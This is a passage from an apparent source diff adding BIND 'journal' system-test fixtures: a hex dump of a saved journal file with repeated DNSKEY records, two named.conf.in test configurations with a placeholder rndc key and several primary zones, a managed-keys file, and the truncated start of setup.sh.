+00000cd5000000000000002100000600 +01000000000016000000000cd4000000 +00000000000000000000000000000001 +1f00fffd00010000000001146059f642 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd50000000000000000000000 +00000000000000011f00fffd00010000 +00000114605a283e598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd5 +00000cd6000000000000002100000600 +01000000000016000000000cd5000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605a283e +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd60000000000000000000000 +00000000000000011f00fffd00010000 +00000114605b47c2598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd6 +00000cd7000000000000002100000600 +01000000000016000000000cd6000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605b47c2 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd70000000000000000000000 +00000000000000011f00fffd00010000 +00000114605b79bf598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd7 +00000cd8000000000000002100000600 +01000000000016000000000cd7000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605b79bf +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd80000000000000000000000 +00000000000000011f00fffd00010000 +00000114605c9943598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd8 +00000cd9000000000000002100000600 +01000000000016000000000cd8000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605c9943 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd90000000000000000000000 +00000000000000011f00fffd00010000 +00000114605ccb40598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd9 +00000cda000000000000002100000600 +01000000000016000000000cd9000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605ccb40 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cda0000000000000000000000 +00000000000000011f00fffd00010000 +00000114605deac4598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cda +00000cdb000000000000002100000600 +01000000000016000000000cda000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605deac4 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cdb0000000000000000000000 +00000000000000011f00fffd00010000 +00000114605e1cc0598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cdb +00000cdc000000000000002100000600 +01000000000016000000000cdb000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605e1cc0 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cdc0000000000000000000000 +00000000000000011f00fffd00010000 +00000114605efb3a598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cdc +00000cdd000000000000002100000600 +01000000000016000000000cdc000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605efb3a +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cdd0000000000000000000000 +00000000000000011f00fffd00010000 +00000114605f6e40598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cdd +00000cde000000000000002100000600 +01000000000016000000000cdd000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605f6e40 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cde0000000000000000000000 +00000000000000011f00fffd00010000 +0000011460604cbb598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cde +00000cdf000000000000002100000600 +01000000000016000000000cde000000 +00000000000000000000000000000001 +1f00fffd000100000000011460604cbb +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cdf0000000000000000000000 +00000000000000011f00fffd00010000 +000001146060bfc0598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cdf +00000ce0000000000000002100000600 +01000000000016000000000cdf000000 +00000000000000000000000000000001 +1f00fffd00010000000001146060bfc0 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000ce00000000000000000000000 +00000000000000011f00fffd00010000 +0000011460619e3b598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000ce0 +00000ce1000000000000002100000600 +01000000000016000000000ce0000000 +00000000000000000000000000000001 +1f00fffd000100000000011460619e3b +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000ce10000000000000000000000 +00000000000000011f00fffd00010000 +0000011460621140598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000ce1 +00000ce2000000000000002100000600 +01000000000016000000000ce1000000 +00000000000000000000000000000001 +1f00fffd000100000000011460621140 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000ce20000000000000000000000 +00000000000000011f00fffd00010000 +000001146062efbb598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b5 diff --git a/bin/tests/system/journal/ns1/maxjournal.jnl.saved b/bin/tests/system/journal/ns1/maxjournal.jnl.saved Binary files differnew file mode 100644 index 0000000..7c79e5c --- /dev/null +++ b/bin/tests/system/journal/ns1/maxjournal.jnl.saved diff --git a/bin/tests/system/journal/ns1/maxjournal2.jnl.saved b/bin/tests/system/journal/ns1/maxjournal2.jnl.saved Binary files differnew file mode 100644 index 0000000..e200905 --- /dev/null +++ b/bin/tests/system/journal/ns1/maxjournal2.jnl.saved diff --git a/bin/tests/system/journal/ns1/named.conf.in b/bin/tests/system/journal/ns1/named.conf.in new file mode 100644 index 0000000..1f6e983 --- /dev/null +++ b/bin/tests/system/journal/ns1/named.conf.in @@ -0,0 +1,92 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation yes; + minimal-responses no; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone changed { + type primary; + update-policy local; + file "changed.db"; +}; + +zone unchanged { + type primary; + update-policy local; + file "unchanged.db"; +}; + +zone changed2 { + type primary; + update-policy local; + file "changed2.db"; +}; + +zone unchanged2 { + type primary; + update-policy local; + file "unchanged2.db"; +}; + +zone hdr1d1d2d1d2 { + type primary; + update-policy local; + file "d1212.db"; +}; + +zone hdr1d2d1d2d1 { + type primary; + update-policy local; + file "d2121.db"; +}; + +zone ixfr { + type primary; + ixfr-from-differences yes; + file "ixfr.db"; +}; + +zone maxjournal { + type primary; + max-journal-size 1k; + update-policy local; + file "maxjournal.db"; +}; + +zone maxjournal2 { + type primary; + max-journal-size 1k; + update-policy local; + file "maxjournal2.db"; +}; diff --git a/bin/tests/system/journal/ns1/unchanged.ver1.jnl.saved b/bin/tests/system/journal/ns1/unchanged.ver1.jnl.saved Binary files differnew file mode 100644 index 0000000..f7885d9 --- /dev/null +++ b/bin/tests/system/journal/ns1/unchanged.ver1.jnl.saved diff --git a/bin/tests/system/journal/ns1/unchanged.ver2.jnl.saved b/bin/tests/system/journal/ns1/unchanged.ver2.jnl.saved Binary files differnew file mode 100644 index 0000000..d974be4 --- /dev/null +++ b/bin/tests/system/journal/ns1/unchanged.ver2.jnl.saved diff --git a/bin/tests/system/journal/ns2/managed-keys.bind.in b/bin/tests/system/journal/ns2/managed-keys.bind.in new file mode 100644 index 0000000..2139706 --- /dev/null +++ b/bin/tests/system/journal/ns2/managed-keys.bind.in @@ -0,0 +1,14 @@ +$ORIGIN . +$TTL 0 ; 0 seconds +@ IN SOA . . ( + 29 ; serial + 0 ; refresh (0 seconds) + 0 ; retry (0 seconds) + 0 ; expire (0 seconds) + 0 ; minimum (0 seconds) + ) + KEYDATA 20210611104535 19700101000000 19700101000000 0 0 0 ( + + ) ; ZSK; alg = 0; key id = 0 + ; next refresh: Fri, 11 Jun 2021 10:45:35 GMT + ; no trust diff --git a/bin/tests/system/journal/ns2/managed-keys.bind.jnl.in b/bin/tests/system/journal/ns2/managed-keys.bind.jnl.in Binary files differnew file mode 100644 index 0000000..01c1d47 --- /dev/null +++ b/bin/tests/system/journal/ns2/managed-keys.bind.jnl.in diff --git a/bin/tests/system/journal/ns2/named.conf.in b/bin/tests/system/journal/ns2/named.conf.in new file mode 100644 index 0000000..4c07c92 --- /dev/null +++ b/bin/tests/system/journal/ns2/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + dnssec-validation yes; + minimal-responses no; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/journal/setup.sh b/bin/tests/system/journal/setup.sh new file mode 100644 index 0000000..e9b0072 --- /dev/null +++ b/bin/tests/system/journal/setup.sh @@ -0,0 +1,51 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information 